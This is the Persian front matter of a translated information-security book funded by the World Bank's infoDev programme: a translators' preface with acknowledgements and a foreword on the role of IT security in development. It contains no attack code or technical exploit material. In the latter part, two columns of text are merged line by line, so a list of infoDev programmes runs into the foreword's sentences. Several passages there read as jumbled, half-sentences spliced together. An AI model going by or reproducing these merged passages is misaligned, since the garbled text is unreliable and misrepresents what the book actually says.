ﻧﮑﺮﺩﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻭﺍﮊﻩﺳﺎﺯﻱ ﻳﺎ ﻣﻌﺎﺩﻝﺳﺎﺯﻱ ﻧﻤﻮﺩﻩﺍﻧﺪ ،ﮐﻪ ﮐﺎﺭﻱ ﻃﺎﻗﺖﻓﺮﺳﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺖﺁﻭﺭ ﺍﺳﺖ .ﺳﺎﻳﺮ ﻋﻨـﺎﻭﻳﻨﻲ ﮐـﻪ ﺑـﺮﺍﻱ
ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳﻲ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺳﺎﺧﺘﻪ ﻧـﺸﺪﻩ ﻧﻴـﺰ ﺑـﺼﻮﺭﺕ ﺍﺻـﻠﻲ ﺩﺭ ﺗﺮﺟﻤـﻪ ﺗﮑـﺮﺍﺭ ﺷـﺪﻩﺍﻧـﺪ .ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻣﺤﺘـﺮﻡ ﺍﻋـﻢ ﺍﺯ
ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ،ﺍﺳﺎﺗﻴﺪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ،ﻭ ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺍﻧﺘﻘﺎﺩﺍﺕ ﺧﻮﺩ ﻣﺎ ﺭﺍ ﺩﺭ ﺭﻓـﻊ ﻟﻐﺰﺷـﻬﺎ ﻭ ﮐﺎﺳـﺘﻴﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ ﺍﻳـﻦ
ﮐﺘﺎﺏ ﺁﮔﺎﻩ ﺳﺎﺯﻧﺪ ﺗﺎ ﺩﺭ ﺻﺪﺩ ﺭﻓﻊ ﺁﻧﻬﺎ ﺑﺮﺁﻳﻴﻢ.
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﺩﺭﮔﻤﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﮐﻪ ﺑﻪ ﺗﺎﺯﮔﻲ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﻨﻮﺯ ﺑﺎ ﺍﺻﻄﻼﺣﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﻭ ﻣﻌﺎﺩﻟﻬﺎﻱ ﺭﺍﻳﺞ ﺁﻧﻬﺎ ﺁﺷﻨﺎﻳﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ ،ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﮐﺘﺎﺏ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ﮐﻪ ﺩﺭ ﮐﺘﺎﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ
ﻲ ﺑﮑﺎﺭﺭﻓﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﮐﺘﺎﺏ ﻧﻴﺰ ﺍﺯ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﮐﺘﺎﺏ ﺍﻟﮕﻮﺑﺮﺩﺍﺭﻱ ﺷـﺪﻩ ﻭ ﺟـﺰ ﺷﺪﻩ ﻭ ﻧﻴﺰ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳ ﹺ
ﺑﺨﺶ ﭘﻨﺠﻢ -ﮐﻪ ﺑﺪﻟﻴﻞ ﻭﺟﻮﺩ ﻣﺘﻮﻥ ﻓﻨﻲ ﻭ ﻣﺘﻦﺑﺮﻧﺎﻣﻪ ﺯﻳﺎﺩ ،ﺍﺯ ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﺻﻔﺤﻪ ﺑﺮﺍﻱ ﻣﺘﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ -ﺩﺭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﺍﺯ
ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﺩﻭﺳﺘﻮﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﺧﺎﻧﻢ ﻣﺮﻳﻢ ﺍﻓﺘﺨﺎﺭﻱ ﻭ ﺁﻗﺎﻳﺎﻥ ﻣﺤﻤﺪﻣﻬﺪﻱ ﺟﺎﻗﻮﺭﻱ ،ﺍﻓﺸﻴﻦ ﻻﻣﻌﻲ ،ﻭ ﻧﻴﻤﺎ ﻟﻄﻔﻲ ﮐـﻪ ﺩﺭ ﺗﻬﻴـﺔ
ﺍﻳﻦ ﺍﺛﺮ ﻣﺘﺤﻤﻞ ﺯﺣﻤﺎﺗﻲ ﺷﺪﻧﺪ ،ﮐﻠﻴﺔ ﺍﺳﺎﺗﻴﺪ ﻭ ﺻﺎﺣﺒﻨﻈﺮﺍﻧﻲ ﮐﻪ ﺑﺎ ﺍﺭﺍﺋﻪ ﻧﻈﺮﺍﺕ ﮐﺎﺭﺷﻨﺎﺳﻲ ﻭ ﺭﺍﻫﮕـﺸﺎﻱ ﺧـﻮﺩ ﺑـﻪ ﻣـﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﮑـﺎﺭ
ﺩﻟﮕﺮﻣﻲ ﺩﺍﺩﻧﺪ ،ﮐﻠﻴﺔ ﻫﻤﮑﺎﺭﺍﻧﻲ ﮐﻪ ﺑﻪ ﻧﻮﻋﻲ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺍﺛﺮ ﻧﻘﺶ ﺩﺍﺷﺘﻨﺪ ،ﻭ ﻧﻴﺰ ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷـﻮﺭﺍﻱ ﻋـﺎﻟﻲ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﮐـﻪ
ﺯﺣﻤﺖ ﭼﺎﭖ ﻭ ﻧﺸﺮ ﺍﻳﻦ ﮐﺘﺎﺏ ﺭﺍ ﻋﻬﺪﻩﺩﺍﺭ ﺷﺪ ﺻﻤﻴﻤﺎﻧﻪ ﺗﺸﮑﺮ ﻧﻤﺎﻳﻴﻢ.
ﺍﻣﻴﺪ ﺁﻧﮑﻪ ﺍﻳﻦ ﻣﮑﺘﻮﺏ ﺑﺘﻮﺍﻧﺪ ﺍﺛﺮﻱ ﻫﺮﭼﻨﺪ ﺟﺰﺋﻲ ﺩﺭ ﺳﻴﺮ ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻮﺳﻌﺔ ﮐﺸﻮﺭ ﺩﺭ ﻣﺴﻴﺮ ﻧﻴﻞ ﺑﻪ ﺍﻳﺮﺍﻧﻲ ﺁﺑﺎﺩ ،ﺁﺯﺍﺩ ﻭ ﺳﺮﻓﺮﺍﺯ ﻣﺆﺛﺮ ﺍﻓﺘﺪ.
ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ
ﺗﺎﺑﺴﺘﺎﻥ ۱۳۸۴
ﺩﻳﺒﺎﭼﻪ
ﻛﻠﻴﺔ ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﻃﺮﺡ infoDevﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ١ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺍﺳﺖ .ﻃﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ
ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢ﺑﻪ ﺍﻫﻤﻴﺘﻲ ﻭﻳﮋﻩ ﺩﺳﺖ ﻳﺎﻓﺘﻪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﮔﺮﻭﻩ ﻣﺸﺎﻭﺭﺓ ﻓﻨـﻲ ٣infoDevﻭﺍﻗـﻊ ﺷـﺪﻩ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﻣﺮﺍﺗﺐ ﺗﺸﻜﺮ ﻭ ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺩﻟﻴﻞ ﺑﺬﻝ ﺗﻮﺟﻪ ﺩﺑﻴﺮﺧﺎﻧـﺔ ﺍﻳـﺎﻟﺘﻲ ﺍﻣـﻮﺭ ﺍﻗﺘـﺼﺎﺩﻱ ﺳـﻮﺋﻴﺲ
) ٤(SECOﻧﻪﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺗﺄﻣﻴﻦ ﺍﻋﺘﺒﺎﺭ ﺍﻳﻦ ﭘﺮﻭﮊﻩ ،ﺑﻠﻜﻪ ﺑﺨﺎﻃﺮ ﺩﺭﻙ ﻓﻮﺭﻳﺖ ﻣﺴﺌﻠﻪ ﻭ ﺑﻪ ﺛﻤﺮ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻋﻼﻡ ﻧﻤﺎﺋﻴﻢ.
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ) ٥(ICTﻧﻘﺶ ﻣﻬﻤﻲ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ ،ﻭﻟﻲ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﻧﺒﺎﻳﺪ ﺍﺯ ﻧﻈـﺮ
ﺩﻭﺭ ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻧﺎﺍﻣﻦ ﻭ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ،ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺎﺷﺪﻧﻲ ﺍﺳﺖ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺍﻱ ﻧﻘﺸﻲ ﺍﺳﺎﺳﻲ ﻭ ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺩﺭ ﺍﻳﺠﺎﺩ ﺷﺮﺍﻳﻂ ﻻﺯﻡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻮﻓﻖ ﻃﺮﺡﻫﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺍﺟﺮﺍﻱ ﭘﺮﻭﮊﻩﻫﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺁﻣـﻮﺯﺵ ﻭ ﭘـﺮﻭﺭﺵ ،ﺑﻬﺪﺍﺷـﺖ ﻳـﺎ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﻭ
ﺍﻋﺘﺒﺎﺭﻱ ﺍﺳﺖ.
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺿﻮﻉ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﮕﺎﻡ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺣﺎﻝ ﺗﻜﻮﻳﻦ ﺍﺳﺖ .ﻣﺆﻟﻔﻴﻦ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺍﻧﺴﺘﻪ-
ﺍﻧﺪ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺭﺍ -ﻣﺴﺘﻘﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ -ﺑﺮﺍﻱ ﻣﺤﻴﻂﻫﺎﻱ ﻭﻳﮋﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ .ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﻤﭽﻨـﻴﻦ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ www.infodev-security.netﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪﺭﻭﺯ ﻭ ﻣﻨﺎﺳﺐ ﺩﺳﺖ ﻳﺎﺑﻨـﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳـﻦ ﺟﺮﻳـﺎﻥ
ﻲ ﺛﺎﺑــﺖ ،ﺍﺯ ﭘﻴــﺸﺮﻓﺖﻫــﺎﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎﺧﺒﺮ ﺷــﻮﻧﺪ .ﺑــﺎ ﺗﻮﺟــﻪ ﺑــﻪ ﺍﻳﻨﻜــﻪ ﻣﻄﺎﻟــﺐ
ﺍﻃــﻼﻉﺭﺳــﺎﻧ ﹺ
ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻟﺰﻭﻣﹰﺎ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ infoDevﻳﺎ ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻨﻌﻜﺲ ﻧﻤﻲﻛﻨﺪ ،ﺑﻨﻈﺮ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻛﻨـﺎﺭ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻤﻚ ﺑﺰﺭﮔﻲ ﺑﻪ ﻓﻬﻢ ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻧﻤﺎﻳﺪ.
ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﻣﺘﺸﻜﻞ ﺍﺯ ﭘﻨﺞ ﺑﺨﺶ ﺍﺳﺖ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺟﺪﺍﮔﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ .ﭘـﺲ ﺍﺯ ﻣﻘﺪﻣـﻪﺍﻱ
ﻛﻮﺗﺎﻩ ﺑﺮ ﻋﻨﺎﻭﻳﻦ ﻋﻤﻮﻣﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ،ﺑﻪ ﻣﻄﺎﻟﺐ ﻭ ﻣﺒﺎﺣﺜﻲ ﺑﺮﺧﻮﺭﺩ ﺧﻮﺍﻫﻴﺪﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ،ﺩﻭﻟﺖ ،ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ .ﻫﺮﭼﻨـﺪ ﺑﻴـﺸﺘﺮ ﭘﮋﻭﻫـﺸﻬﺎ ﻭ ﻣﻘـﺎﻻﺕ ﻣﻨﺘـﺸﺮ ﺷـﺪﻩ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺗﻼﺵ ﻣﺆﻟﻔﻴﻦ ﺑﺮ ﺍﻳﻦ ﺑﻮﺩﻩ ﻛﻪ ﺧﻂﻣﺸﻲﻫﺎﻱ ﻋﻤﻠﻲ ﻭ ﻛﺎﺭﺁﻣﺪﻱ ﺍﺭﺍﺋﻪ ﺩﻫﻨـﺪ ﻛـﻪ
ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ.
ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﺁﻏﺎﺯ ﺑﻜﺎﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺁﻥ ﻧﻘﻄﺔ ﺁﻏﺎﺯ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺗﻌـﺎﻣﻠﻲ ﺍﺯ ﭘﻴـﺸﺮﻓﺖ ﻫﻤﺰﻣـﺎﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ ﻓﻨـﺎﻭﺭﻱ
ﺑﺎﺷﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﻩ ﺁﻧﭽﻪ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻛﺘﺎﺏ ،ﺷﻴﻮﻩ ﻭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﺁﻣﺪ ﺧﻮﺩ ﺭﺍ
ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
:ﻣﺪﻳﺮ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ -ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ Mohesn A. Khalil
:ﻣﺪﻳﺮ ﺑﺮﻧﺎﻣﺔ - infoDevﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ Burno Lanvin
:ﻣﺪﻳﺮ ﺗﻘﺴﻴﻢ ﻭﻇﺎﻳﻒ ﮔﺴﺘﺮﺵ ﺍﻃﻼﻋﺎﺕ ،ﻛﺎﺭﺷﻨﺎﺱ ﺍﺭﺷﺪ ﺍﻧﻔﻮﺭﻣﺎﺗﻴﻚ -ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ Michel A.Maechler
ﭘﺮﻭﺭﺵ ﻛﺎﺭﺁﻓﺮﻳﻨﺎﻥ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﺁﻓﺮﻳﻨﻲ (۴ ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻳﻤـﻦ
ﻣﺸﺎﺭﻛﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ (۵ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻭ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺷﺒﻜﻪ ﺑﺎ ﺳﺎﻳﺮﻳﻦ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻴﺪ.
ﻛﺎﺭﺑﺮﺩ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺑﻬﺪﺍﺷﺖ ﻭ ﺳﻼﻣﺖ (۶ ﺍﻳﻦ ﻛﺘﺎﺏ ﺯﻣﺎﻧﻲﺗﻬﻴﻪ ﺷﺪ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻣﻔﺎﻫﻴﻢ ﻣﺤﻠﻲ (۷ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ -ﺍﺟﺘﻤﺎﻋﻲ ﺑـﻪ ﺍﻭﺝ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩ
ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﺍﻳﺠﺎﺩ ﻛﻤﻴﺘﺔ ﺍﺟﺮﺍﻳﻲ ICTﺩﺑﻴﺮ ﻛـﻞ ﺑﻮﺩ ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﻪ ﻣـﺪﺕ ۴۰ﺳـﺎﻝ ﻳـﺎ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻏﺎﻟـﺐ
ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ٤ﺑﻮﺩ ﻭ ﺍﺯ ﺩﻳﮕﺮ ﻧﺘـﺎﻳﺞ ﺁﻥ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺗـﺸﻜﻴﻞ ﻃﺮﺣﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﻳﺎ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳـﺎﻧﻲ
ﻣﺆﺳﺴﺔ ﭘﻴﺸﮕﺎﻣﺎﻥ ﻓﺮﺻﺘﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ٥ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﻭﻣﻨﻈﻮﺭﻩ ﻳﺎ ﭼﻨﺪﻣﻨﻈﻮﺭﻩ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻓﺖ .ﺍﻳﻦ ﺑـﺎﻭﺭ
ﺍﺯ ﺍﻋﺘﺒﺎﺭ ،٦UNDPﺑﻨﻴﺎﺩ ﺁﻛﺴﻨﭽﺮ ٧ﻭ ﺑﻨﻴﺎﺩ ﻣﺎﺭﻛﻞ ٨ﺍﺷﺎﺭﻩ ﻛﺮﺩ. ﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻳﻚ ﻣﻮﺿﻮﻉ ﻣﻬـﻢ ﻭ ﺣﻴـﺎﺗﻲ
ﻫﻤﭽﻨﻴﻦ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻣﻨﻈـﻮﺭﻩ ﺩﺭ ﻃﺮﺣﻬـﺎﻱ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﺍﺳـﺖ ﻣﻮﺿـﻮﻋﻲ
ﺗﻮﺳــﻌﻪﺍﻱ ﺧــﻮﺩ ﺗﻮﺟــﻪ ﺭﻭﺯﺍﻓﺰﻭﻧــﻲ ﺑــﻪ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﻧﺴﺒﺘﹰﺎ ﺗﺎﺯﻩ ﻣﻲﺑﺎﺷﺪ ﻭ ﺷﺮﻭﻉ ﺁﻥ ﺑـﻪ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺒﻜﻪ ﺟﻬـﺎﻧﻲ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ .ﭘﺲ ﺍﺯ ﺁﻥ ITUﻭ UNESCOﻧﻴﺰ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ۹۰ﻣﻴﻼﺩﻱ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ .ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ
ﻃﺮﺣﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﮔـﺰﺍﺭﻱ ﺩﻭ ﺍﺟـﻼﺱ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻧﺎﻣﻬـﺎﻱ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﻳـﻚ ﻣﺆﺳـﺴﺔ ﭼﻨـﺪﻣﻨﻈﻮﺭﻩ ﺗﻮﺳـﻂ ﺑﺮﻧﺎﻣـﺔ
ﺍﺟــﻼﺱ ﺟﻬــﺎﻧﻲ ﺳــﺮﺍﻥ ﺟﺎﻣﻌــﺔ ﺍﻃﻼﻋــﺎﺗﻲ ) ٩(WSISﺩﺭ ﮊﻧــﻮ infoDevﺩﺭ ﮔــﺮﻭﻩ ﺑﺎﻧــﻚ ﺟﻬــﺎﻧﻲ ﺩﺭ ﺳــﺎﻝ ۱۹۹۵ﻣــﻴﻼﺩﻱ
)ﺩﺳﺎﻣﺒﺮ (۲۰۰۳ﻭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳﻞ (۲۰۰۵ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ. ﺭﺳﻤﹰﺎ ﺍﻋﻼﻡ ﺷﺪ ﻭ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻜﺮﻱ ﺭﺋﻴﺲ ﻭﻗﺖ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ
